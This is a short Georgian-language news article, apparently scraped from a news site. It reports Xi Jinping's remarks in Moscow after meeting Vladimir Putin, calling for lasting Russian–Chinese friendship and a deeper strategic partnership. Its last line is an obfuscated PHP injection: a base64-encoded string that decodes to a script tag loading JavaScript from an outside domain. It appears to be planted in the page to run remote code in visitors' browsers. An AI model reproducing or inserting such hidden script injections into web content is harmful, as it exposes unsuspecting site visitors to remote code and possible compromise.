gorgia
ავერსი jaluzi

რუსეთი და ჩინეთი ნამდვილი მეგობრები უნდა იყვნენ, – ამის შესახებ ჩინეთის პრეზიდენტმა, სი ძინპინმა მოსკოვში, რუსეთის პრეზიდენტ ვლადიმერ პუტინთან შეხვედრის შემდეგ განაცხადა.

„აუცილებელია, თაობიდან თაობამდე შენარჩუნდეს მეგობრობა და ვიყოთ ნამდვილი მეგობრები, ფოლადივით გამოწრთობილნი“, – აღნიშნა სი ძინპინმა.

ჩინეთის პრეზიდენტის თქმით, 80 წლის წინ ჩინეთისა და რუსეთის არმიები და ხალხები, ძალების გაერთიანებით, მხარდამხარ იბრძოდნენ.

„დიდი მეგობრობა, რომელიც ორი ქვეყნის ხალხებს შორის ცეცხლითა და სისხლით გამოიწრთო, გახდა მყარი საფუძველი ორმხრივი ურთიერთობების მაღალ დონეზე განვითარებისთვის“, – განაცხადა სი ძინპინმა.

ჩინეთის ლიდერი რუსეთში ვიზიტით გუშინ ჩავიდა, სადაც რუსეთის პრეზიდენტთან მოლაპარაკებები გამართა. გარდა ამისა, ვლადიმირ პუტინმა და სი ძინპინმა მიიღეს ერთობლივი განცხადება რუსეთისა და ჩინეთის ყოვლისმომცველი პარტნიორობისა და სტრატეგიული ურთიერთობების შემდგომი გაღრმავების შესახებ.

69
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");